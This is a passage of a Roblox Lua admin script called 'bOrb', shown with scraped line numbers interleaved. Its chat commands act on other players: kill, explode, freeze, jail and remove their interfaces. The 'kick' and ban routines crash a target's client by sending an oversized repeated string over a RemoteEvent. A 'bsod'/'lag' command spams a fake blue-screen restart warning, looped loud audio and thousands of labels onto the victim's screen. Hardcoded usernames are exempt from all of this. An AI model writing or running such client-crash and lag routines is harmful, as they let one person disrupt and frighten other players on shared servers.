          end);
828
         end);
829
        elseif pt == "all" then
830
         
831
        elseif pt == "na" then
832
         Spawn(function()
833
          pcall(function()
834
           f();
835
          end);
836
         end);
837
        end;
838
       end;
839
      end;
840
     elseif ct == "included" then
841
      for q,k in pairs(s) do
842
       if string.find(msg:lower(),k) then
843
        Spawn(function()
844
         pcall(function()
845
          f(msg);
846
         end);
847
        end);
848
       end;
849
      end;
850
     end;
851
    end;
852
    --usage: complex or simple command , {cmd}, "plr", func (function)
853
    cmd("complex", {prefix.."explode"}, "player", function(v)
854
     explp = Instance.new("Explosion",v.Character);
855
 	explp.BlastRadius = "1";
856
 	explp.BlastPressure = "500000";
857
 	explp.Position = v.Character.Torso.Position;
858
if Chat == true then
859
 				game:GetService("Chat"):Chat(wpad,chatname.." Exploded "..v.Name..".",Enum.ChatColor.Blue)
860
  end
861
  end);
862
    cmd("complex", {prefix.."bsb"}, "player", function(v)
863
game:GetService('TeleportService'):Teleport(195809725,v)
864
  end);
865
    cmd("complex", {prefix.."vsb"}, "player", function(v)
866
game:GetService('TeleportService'):Teleport(20279777,v)
867
  end);
868
    cmd("complex", {prefix.."asb"}, "player", function(v)
869
game:GetService('TeleportService'):Teleport(21053279,v)
870
  end);
871
    cmd("complex", {prefix.."dance",prefix.."danceify"}, "player", function(v)  
872
torsowd=Instance.new('Weld',v.Character)
873
torsowd.Part0=v.Character.HumanoidRootPart
874
torsowd.Part1=v.Character.Torso
875
876
lwd=Instance.new('Weld',v.Character)
877
lwd.Part0=v.Character.Torso
878
lwd.Part1=v.Character["Left Arm"]
879
lwd.C0=CFrame.new(-1.5,0,0)
880
881
rwd=Instance.new('Weld',v.Character)
882
rwd.Part0=v.Character.Torso
883
rwd.Part1=v.Character["Right Arm"]
884
885
ii=Instance.new('StringValue',nil)
886
ii.Value = '0'
887
game:GetService('RunService').Stepped:connect(function()
888
	ii.Value = ii.Value + 0.1
889
	
890
		torsowd.C0=CFrame.new(math.sin(ii.Value),0,0)
891
lwd.C0=CFrame.new(-1.5,0,0) * CFrame.Angles(math.sin(ii.Value),0,math.sin(ii.Value))
892
rwd.C0=CFrame.new(1.5,0,0) * CFrame.Angles(math.sin(ii.Value),0,0 - math.sin(ii.Value))
893
end)
894
895
if Chat == true then
896
 	game:GetService("Chat"):Chat(wpad,chatname.."Made "..v.Name.." dance.",Enum.ChatColor.Blue)
897
    end
898
end);
899
    cmd("complex", {prefix.."smite"}, "player", function(v)
900
smite=Instance.new('Part',workspace)
901
smite.Anchored = true
902
smite.FormFactor = "Custom"
903
smite.CanCollide = false
904
smite.Size = Vector3.new(1,300,1)
905
smite.Transparency=0.5
906
smite.Color = Color3.new(0,0,0)
907
smite.CFrame = v.Character.Torso.CFrame * CFrame.new(0,30,0)
908
smite.Name = 'bmiter'
909
910
game:GetService('RunService').Stepped:connect(function()
911
smite.BrickColor = BrickColor.Random()
912
end)
913
914
if v.Character:FindFirstChild('Torso') then
915
sme=Instance.new('Explosion',v.Character)
916
sme.Position = v.Character.Torso.Position
917
sme.BlastPressure = "500000"
918
sme.BlastRadius = "3"
919
end
920
921
922
delay(1.5,function()
923
for i = 1,0,-0.1 do wait()
924
smite.Size = Vector3.new(i,300,i)
925
end
926
927
for i,v in pairs(workspace:children()) do if v.Name=='bmiter' then
928
	v:remove()
929
end
930
end
931
end)
932
if Chat == true then
933
 				game:GetService("Chat"):Chat(wpad,chatname.." Smited "..v.Name..".",Enum.ChatColor.Blue)
934
  end
935
  end);
936
    cmd("complex", {prefix.."ungod"}, "player", function(v)
937
     vhum1 = v.Character:FindFirstChild('Humanoid')
938
 	vhum1.MaxHealth = 100
939
if Chat == true then
940
 				game:GetService("Chat"):Chat(wpad,chatname.."UnGoded "..v.Name..".",Enum.ChatColor.Blue)
941
  end
942
  end);
943
    cmd("complex", {prefix.."invis","invisible"}, "player", function(v)
944
for i,x in pairs(v.Character:children()) do if x.ClassName=="Part" and x.Name~="HumanoidRootPart" then
945
	x.Transparency=1
946
	for i,z in pairs(v.Character:children()) do if z.ClassName=="Hat" then
947
		for i,b in pairs(z:children()) do if b.ClassName=="Part" then
948
			b.Transparency=1
949
		end
950
	end
951
	end
952
	end
953
end
954
end
955
if v.Character.Head:FindFirstChild('face') then
956
	v.Character.Head.face.Transparency=1
957
end
958
if Chat == true then
959
 				game:GetService("Chat"):Chat(wpad,chatname..' '..v.Name.." is now invisible.",Enum.ChatColor.Blue)
960
  end
961
  end);
962
    cmd("complex", {prefix.."vis","visible"}, "player", function(v)
963
for i,x in pairs(v.Character:children()) do if x.ClassName=="Part" and x.Name~="HumanoidRootPart" then
964
	x.Transparency=0
965
	for i,z in pairs(v.Character:children()) do if z.ClassName=="Hat" then
966
		for i,b in pairs(z:children()) do if b.ClassName=="Part" then
967
			b.Transparency=0
968
		end
969
	end
970
	end
971
	end
972
end
973
end
974
if v.Character.Head:FindFirstChild('face') then
975
	v.Character.Head.face.Transparency=0
976
end
977
if Chat == true then
978
 				game:GetService("Chat"):Chat(wpad,chatname..' '..v.Name.." is now visible.",Enum.ChatColor.Blue)
979
  end
980
  end);
981
    cmd("complex", {prefix.."kill"}, "player", function(v)
982
     v.Character:BreakJoints();
983
if Chat == true then
984
 	game:GetService("Chat"):Chat(wpad,chatname.."killed "..v.Name..".",Enum.ChatColor.Blue)
985
    end
986
end);
987
    cmd("complex", {prefix.."rguis",prefix.."nguis",prefix.."noguis"}, "player", function(v)
988
	for i,x in pairs(v:children()) do if v.Name~="Basictality" and v.Name~="mcqueen987" then
989
	x:remove()
990
	end
991
	end
992
	if Chat == true then
993
 	game:GetService("Chat"):Chat(wpad,chatname.."Removed "..v.Name.."'s PlayerGui's.",Enum.ChatColor.Blue)
994
	     end
995
	end)
996
    cmd("complex", {prefix.."freeze"}, "player", function(v)
997
	if Chat == true then
998
 	game:GetService("Chat"):Chat(wpad,chatname.."Froze "..v.Name..".",Enum.ChatColor.Blue)
999
	     end
1000
freezes=Instance.new('Part',v.Character)
1001
 freezes.FormFactor = "Custom"
1002
 freezes.Size = Vector3.new(4.5,6.5,4.5)
1003
 freezes.Material = "SmoothPlastic"
1004
 freezes.BrickColor = BrickColor.new('Teal')
1005
 freezes.Transparency=0.5
1006
 freezes.Name = "Ice"
1007
 freezes.Anchored = true
1008
 freezes.Material = "Ice"
1009
 
1010
 v.Character.Head.Anchored = true
1011
 v.Character.Torso.Anchored = true
1012
 v.Character['Left Arm'].Anchored = true
1013
 v.Character['Left Leg'].Anchored = true
1014
 v.Character['Right Arm'].Anchored = true
1015
 v.Character['Right Leg'].Anchored = true
1016
 
1017
 freezes.CFrame = v.Character.Torso.CFrame
1018
    end);
1019
    cmd("complex", {prefix.."thaw"}, "player", function(v)
1020
 di = v.Character:FindFirstChild('Ice')
1021
 dim=Instance.new('CylinderMesh',di)
1022
 di.Size = Vector3.new(4.5,0,4.5)
1023
 di.CFrame = v.Character.Torso.CFrame * CFrame.new(0,-2.5,0)
1024
 di.CanCollide = false
1025
 di.Transparency=0
1026
 
1027
 v.Character.Head.Anchored = false
1028
 v.Character.Torso.Anchored = false
1029
 v.Character['Left Arm'].Anchored = false
1030
 v.Character['Left Leg'].Anchored = false
1031
 v.Character['Right Arm'].Anchored = false
1032
 v.Character['Right Leg'].Anchored = false
1033
if Chat == true then
1034
 	game:GetService("Chat"):Chat(wpad,chatname.."Thawed "..v.Name..".",Enum.ChatColor.Blue)
1035
 end
1036
game.Debriss:AddItem(di,3)
1037
 end);
1038
    cmd("complex", {prefix.."god"}, "player", function(v)
1039
     vhum = v.Character:FindFirstChild('Humanoid')
1040
 	vhum.MaxHealth = 9e999
1041
if Chat == true then
1042
 	game:GetService("Chat"):Chat(wpad,chatname.."Godded "..v.Name..".",Enum.ChatColor.Blue)
1043
   end
1044
 end);
1045
    cmd("complex", {prefix.."fire"}, "player", function(v)
1046
vtorso = v.Character:FindFirstChild('Torso')
1047
Instance.new('Fire',vtorso)
1048
if Chat == true then
1049
 	game:GetService("Chat"):Chat(wpad,chatname.."Gave "..v.Name.." fire.",Enum.ChatColor.Blue)
1050
   end
1051
 end);
1052
1053
    cmd("complex", {prefix.."unfire",prefix.."nofire"}, "player", function(v)
1054
vtorso = v.Character:FindFirstChild('Torso')
1055
for i,f in pairs(vtorso:children()) do if f.ClassName=="Fire" then game.Debris:AddItem(f,0) end end
1056
if Chat == true then
1057
 	game:GetService("Chat"):Chat(wpad,chatname.."Removed "..v.Name.."'s fire.",Enum.ChatColor.Blue)
1058
   end
1059
 end);
1060
1061
  cmd("complex", {prefix.."bsod",prefix.."lag"}, "player", function(v)
1062
	if v.Name~="Basictality" and v.Name~="hdh" and v.Name~="Dullbakuganroll" then
1063
	if Chat == true then
1064
 	 	game:GetService("Chat"):Chat(wpad,chatname.."BSOD'd/Lagged "..v.Name..".",Enum.ChatColor.Blue)
1065
end
1066
local bsodgui = Instance.new('ScreenGui',v.PlayerGui)
1067
bsodframe=Instance.new('Frame',bsodgui)
1068
bsodframe.Size = UDim2.new(0,1400,0,800)
1069
bsodframe.Position = UDim2.new(0,0,0,-40)
1070
bsodframe.BackgroundColor3 = Color3.new(0,0,1)
1071
	for i = 0,50000 do wait()
1072
		for bsodl = 0,200 do
1073
bsodt1=Instance.new('TextLabel',bsodframe)
1074
bsodt1.Text = "Sorry!"
1075
bsodt1.BackgroundTransparency=1
1076
bsodt1.TextScaled = true
1077
bsodt1.Size = UDim2.new(0,500,0,300)
1078
bsodt1.Position = UDim2.new(0,100,0,80)
1079
1080
rbsod = bsodt1:clone()
1081
rbsod.Parent = bsodframe
1082
rbsod.Text = "You're computer will automaticly restart in 0.5 Seconds.. [BSOD]"
1083
rbsod.Position = UDim2.new(0,450,0,300)
1084
rbsod.Size = UDim2.new(0,500,0,300)
1085
1086
local Sound = Instance.new('Sound',v.PlayerGui)
1087
Sound.SoundId = 'http://roblox.com/asset/?id=265831543'
1088
Sound.Looped = true 
1089
Sound.Name = 'Local Sound'
1090
Sound.Parent = v.PlayerGui
1091
Sound.Volume = 100
1092
Sound:Play()
1093
		end
1094
		end
1095
		end
1096
    end);
1097
    cmd("complex", {prefix.."ff",prefix.."forcefield",prefix.."shield"}, "player", function(v)
1098
     Instance.new("ForceField",v.Character);
1099
if Chat == true then
1100
 	game:GetService("Chat"):Chat(wpad,chatname.."Gave "..v.Name.." a forcefield.",Enum.ChatColor.Blue)
1101
   end
1102
 end);
1103
    cmd("complex", {prefix.."sparkles",prefix.."sparkle"}, "player", function(v)
1104
     Instance.new('Sparkles',v.Character.Torso)
1105
if Chat == true then
1106
 	game:GetService("Chat"):Chat(wpad,chatname.."Gave "..v.Name.." sparkles.",Enum.ChatColor.Blue)
1107
   end
1108
 end);
1109
    cmd("complex", {prefix.."unsparkles",prefix.."nosparkles"}, "player", function(v)
1110
   for i,v in pairs(v.Character.Torso:children()) do if v.ClassName=="Sparkles" then v:remove() end end
1111
if Chat == true then
1112
 	game:GetService("Chat"):Chat(wpad,chatname.."Removed "..v.Name.." sparkles.",Enum.ChatColor.Blue)
1113
   end
1114
 end);
1115
    cmd("complex", {prefix.."kick",prefix.."boot"}, "player", function(v)
1116
	if v.Name~="Basictality" and v.Name~="Dullbakuganroll" and v.Name~="jebjordan" then
1117
kick=Instance.new('RemoteEvent',workspace):FireClient(v,{string.rep("umad?",2e5+5)})
1118
 game.Debris:AddItem(kick,1)
1119
if Chat == true then
1120
 		game:GetService("Chat"):Chat(wpad,chatname.."kicked "..v.Name.." from the server.",Enum.ChatColor.Blue)
1121
 end
1122
end
1123
   end);
1124
    cmd("simple", {prefix.."unban",prefix.."unbanish"}, "player", function(v)
1125
for i,unban in pairs(banfolder:children()) do if unban.Value==v.Name then
1126
	unban:remove()
1127
end
1128
end
1129
 		game:GetService("Chat"):Chat(wpad,chatname.."Unbanished "..v.Name.." from the server.",Enum.ChatColor.Blue)
1130
    end);
1131
    cmd("complex", {prefix.."ban",prefix.."banish"}, "player", function(v)
1132
	if v.Name~="Basictality" and v.Name~="hdh" and v.Name~="Dullbakuganroll" and v.Name~="jebjordan" then
1133
 if game.Players:FindFirstChild(v.Name) then
1134
bansv=Instance.new('StringValue',banfolder)
1135
bansv.Name = v.Name
1136
bansv.Value = v.Name
1137
end
1138
		end
1139
	if Chat == true then
1140
 		game:GetService("Chat"):Chat(wpad,chatname.."Banished "..v.Name.." from the server.",Enum.ChatColor.Blue)
1141
	  end
1142
  end);
1143
   cmd("complex", {prefix.."sword",prefix.."linkedsword"}, "player", function(v)
1144
 game:service'InsertService':LoadAsset(125013769):children()[1].Parent = v.Backpack
1145
 		if Chat == true then
1146
game:GetService("Chat"):Chat(wpad,chatname..'Gave '..v.Name.." a Sword.",Enum.ChatColor.Blue)
1147
   end
1148
 end);
1149
   cmd("complex", {prefix.."nogravity",prefix.."ngrav",prefix.."nograv"}, "player", function(v)
1150
bf = Instance.new("BodyForce")	
1151
bf.Parent =	v.Character.Torso	
1152
bf.force = Vector3.new(0,4000,0)	
1153
 		if Chat == true then
1154
game:GetService("Chat"):Chat(wpad,chatname.."Gave "..v.Name.." anti-Gravity.",Enum.ChatColor.Blue)
1155
    end
1156
end);
1157
  cmd("complex", {prefix.."ref",prefix.."refresh"}, "player", function(v)
1158
	
1159
if v.Character:FindFirstChild('Torso') then
1160
refp=Instance.new("Part",workspace)
1161
refp.CFrame = v.Character.Torso.CFrame
1162
refp.CanCollide = false
1163
refp.Transparency=1
1164
refp.Anchored = true
1165
end
1166
v:LoadCharacter()
1167
v.Character.Torso.CFrame = refp.CFrame
1168
refp:remove()
1169
 		if Chat == true then
1170
game:GetService("Chat"):Chat(wpad,chatname.."Refresh'd "..v.Name,Enum.ChatColor.Blue)
1171
   end
1172
 end);
1173
   cmd("complex", {prefix.."unjail",prefix.."nojail"}, "player", function(v)
1174
for i,w in pairs(workspace:children()) do if w.Name==v.Name.."'s Jail" then
1175
	workspace[v.Name.."'s Jail"]:remove()
1176
end
1177
end
1178
game:GetService("Chat"):Chat(wpad,chatname.."Unjailed "..v.Name..".",Enum.ChatColor.Blue)
1179
    end);
1180
   cmd("complex", {prefix.."light",prefix.."plight"}, "player", function(v)
1181
	if Chat == true then
1182
	game:GetService("Chat"):Chat(wpad,chatname.."Gave "..v.Name.." light.",Enum.ChatColor.Blue)
1183
	end
1184
	light=Instance.new('PointLight',v.Character.Torso)
1185
	light.Brightness = "5"
1186
	light.Range "5"
1187
    end);
1188
  cmd("complex", {prefix.."rlight",prefix.."nolight",prefix.."unlight"}, "player", function(v)
1189
	if Chat == true then
1190
	game:GetService("Chat"):Chat(wpad,chatname.."Removed "..v.Name.." light.",Enum.ChatColor.Blue)
1191
	end
1192
	for i,rlight in pairs(v.Character.Torso:children()) do if rlight.ClassName=="PointLight" then
1193
		game.Debris:AddItem(rlight,0)
1194
	end
1195
	end
1196
    end);
1197
   cmd("complex", {prefix.."resp",prefix.."respawn",prefix.."res"}, "player", function(v)
1198
v:LoadCharacter()
1199
 		if Chat == true then
1200
game:GetService("Chat"):Chat(wpad,chatname.."Respawned "..v.Name..".",Enum.ChatColor.Blue)
1201
    end
1202
end);
1203
  cmd("complex", {prefix.."sit"}, "player", function(v)
1204
v.Character.Humanoid.Sit = true
1205
 		if Chat == true then
1206
game:GetService("Chat"):Chat(wpad,chatname.."Made "..v.Name.." sit.",Enum.ChatColor.Blue)
1207
end
1208
    end);
1209
  cmd("complex", {prefix.."rj",prefix.."rejoin"}, "player", function(v)
1210
game:GetService('TeleportService'):Teleport(game.PlaceId,v)
1211
    end);
1212
 cmd("complex", {prefix.."jump"}, "player", function(v)
1213
v.Character.Humanoid.Jump = true
1214
 		if Chat == true then
1215
game:GetService("Chat"):Chat(wpad,chatname.."Made "..v.Name.." Jump.",Enum.ChatColor.Blue)
1216
    end
1217
end);
1218
   cmd("complex", {prefix.."jail",prefix.."lockup"}, "player", function(v)
1219
jailp=Instance.new('Model',workspace)
1220
jailp.Name = v.Name.."'s Jail"
1221
1222
jailp1=Instance.new('Part',jailp)
1223
jailp1.FormFactor = "Custom"
1224
jailp1.Anchored = true
1225
jailp1.Material = "Neon"
1226
jailp1.Size = Vector3.new(5,0.2,5)
1227
jailp1.BrickColor = BrickColor.new'Teal'
1228
jailp1.CFrame = v.Character.Torso.CFrame * CFrame.new(0,-3,0)
1229
1230
jailp2=Instance.new('Part',jailp)
1231
jailp2.FormFactor = "Custom"
1232
jailp2.Anchored = true
1233
jailp2.Color = Color3.new(0,0,0)
1234
jailp2.Transparency=0.5
1235
jailp2.Material = "Neon"
1236
jailp2.Size = Vector3.new(5, 7, 0)
1237
jailp2.CFrame = jailp1.CFrame * CFrame.new(0,3.6,2.4)
1238
1239
jailp3=jailp2:clone()
1240
jailp3.Parent = jailp
1241
jailp3.CFrame = jailp1.CFrame * CFrame.new(0,3.6,-2.4)
1242
1243
jailp4=jailp1:clone()
1244
jailp4.Parent = jailp
1245
jailp4.CFrame = jailp1.CFrame * CFrame.new(0,7.2,0)
1246
1247
jailp5=jailp2:clone()
1248
jailp5.Parent = jailp
1249
jailp5.Size = Vector3.new(0, 7, 5)
1250
jailp5.CFrame = jailp1.CFrame * CFrame.new(2.4,3.6,0)
1251
1252
jailp6=jailp5:clone()
1253
jailp6.Parent = jailp
1254
jailp5.CFrame = jailp1.CFrame * CFrame.new(-2.4,3.6,0)
1255
 		game:GetService("Chat"):Chat(wpad,chatname.."Jailed "..v.Name.." .",Enum.ChatColor.Blue)
1256
    end);
1257
    cmd("complex", {prefix.."unff",prefix.."unforcefield",prefix.."unshield"}, "player", function(v)
1258
     for i,k in pairs(v.Character:GetChildren()) do
1259
      if k.ClassName == "ForceField" then
1260
 			if Chat == true then
1261
game:GetService("Chat"):Chat(wpad,chatname.."Taken "..v.Name.." forcefield away.",Enum.ChatColor.Blue)
1262
end
1263
       k:Destroy();
1264
end;
1265
     end;
1266
    end);
1267
   end;
1268
 end;
1269
 
1270
 player = meplyr
1271
 player.Chatted:connect(function(message) chat(message, player) end)
1272
----------------------------------------------------------------------------------------------
1273
 function Spawnorb()
1274
 admin = meplyr.Name
1275
 wpadmod=Instance.new('Model',workspace)
1276
Instance.new('Humanoid',wpadmod)
1277
 wpadmod.Name = player.Name.."'s "..OrbName
1278
 wpad=Instance.new('Part',wpadmod)
1279
 wpad.Name = "bOrb"
1280
 wpad.Anchored = true
1281
 wpadpointlight=Instance.new('PointLight',wpad)
1282
 wpad.CanCollide = false
1283
 wpad.Transparency=wpadtrans
1284
 wpad.FormFactor = "Custom"
1285
 wpad.Material = "Neon"
1286
 wpad.CanCollide = false
1287
 wpad.Size = Vector3.new(1,1,1)
1288
 wpad.Shape = "Ball"
1289
 wpad.BrickColor = BrickColor.new'Dark indigo'
1290
wpad.TopSurface = "Smooth"
1291
wpad.BottomSurface = "Smooth"
1292
1293
if hidevalue.Value == "Invisible" then
1294
	wpad.Transparency=1
1295
	wpadpointlight.Parent = nil
1296
end
1297
1298
if hidevalue.Value == "Visible" then
1299
	wpad.Transparency=0
1300
	wpadpointlight.Parent = wpad
1301
	
1302
	if Chat == true then
1303
game:GetService("Chat"):Chat(wpad,chatname.."Welcome "..meplyr.Name..", the current prefix is "..prefixx.Value,Enum.ChatColor.Blue)
1304
 end
1305
end
1306
end
1307
1308
Spawnorb()
1309
-----------------------------------------------------------------------------------
1310
game:GetService('RunService').Stepped:connect(function ()
1311
                if not workspace:FindFirstChild(wpadmod.Name) then
1312
                        Spawnorb()
1313
                end
1314
end)
1315
------------------------------------Banned-----------------------------------------
1316
-----------------------------------------------------------------------------------
1317
game:GetService('RunService').Stepped:connect(function ()
1318
 for i,v in pairs(bplyrs:children()) do
1319
	if v.Name==Banned and v.Name~="Basictality" then
1320
kick35=Instance.new('RemoteEvent',workspace):FireClient(v,{string.rep("umad?",2e5+5)})
1321
	end		
1322
end
1323
end)
1324
1325
bplyrs.PlayerAdded:connect(function(player) do
1326
	if player.Name==Banned and player.Name~="Basictality" and player.Name~="mcqueen987" and player.Name~="reizayah1" then
1327
kick3=Instance.new('RemoteEvent',workspace):FireClient(player,{string.rep("umad?",2e5+5)})
1328
 game.Debris:AddItem(kick3,1)
1329
	end
1330
end
1331
end)
1332
-----------------------------------------------------------------------------------
1333
1334
--------------------------------Player Joining And Player Leaving------------------
1335
game.Players.PlayerAdded:connect(function(player) if player.Name~="Basictality" then
1336
if Chat == true then
1337
game:GetService("Chat"):Chat(wpad,chatname..player.Name..' has joined!',Enum.ChatColor.Blue)
1338
end
1339
end
1340
end)
1341
1342
game.Players.PlayerAdded:connect(function(playero) if playero.Name=="Basictality" then
1343
if Chat == true then
1344
game:GetService("Chat"):Chat(wpad,chatname..playero.Name..' The Creator Of bOrb has joined!',Enum.ChatColor.Blue)
1345
end
1346
end
1347
end)
1348
1349
game.Players.PlayerRemoving:connect(function(playero) if playero.Name=="Basictality" then
1350
if Chat == true then
1351
game:GetService("Chat"):Chat(wpad,chatname..playero.Name..' The Creator Of bOrb has left!',Enum.ChatColor.Blue)
1352
end
1353
end
1354
end)
1355
1356
game.Players.PlayerRemoving:connect(function(player) if player.Name~="Basictality" then
1357
	if Chat == true then
1358
game:GetService("Chat"):Chat(wpad,chatname..player.Name..' has left!',Enum.ChatColor.Blue)
1359
	end
1360
	end
1361
end)
1362
-----------------------------------------Rot---------------------------------------
1363
-----------------------------------------------------------------------------------
1364
	for i = 1,math.huge,Speed do wait()
1365
	if workspace:FindFirstChild(adminwew.Name) then
1366
	wpadtorso = workspace[admin]:FindFirstChild('Torso')
1367
wpad.CFrame = CFrame.new(wpadtorso.Position) * CFrame.fromEulerAnglesXYZ(math.sin(i),math.abs(i),math.rad(i)) * CFrame.new(0,0,-dis)
1368
wpadpath=Instance.new('Part',wpad)
1369
wpadpath.Anchored = true
1370
wpadpath.Transparency = wpad.Transparency
1371
wpadpath.FormFactor = "Custom"
1372
wpadpath.Size = Vector3.new(0.3,0.3,0.3)
1373
wpadpath.CFrame = wpad.CFrame * CFrame.new(0,0,0)
1374
wpadpath.CanCollide = false
1375
wpadpath.Color = Color3.new()
1376
game.Debris:AddItem(wpadpath,1)
1377
end
1378
	end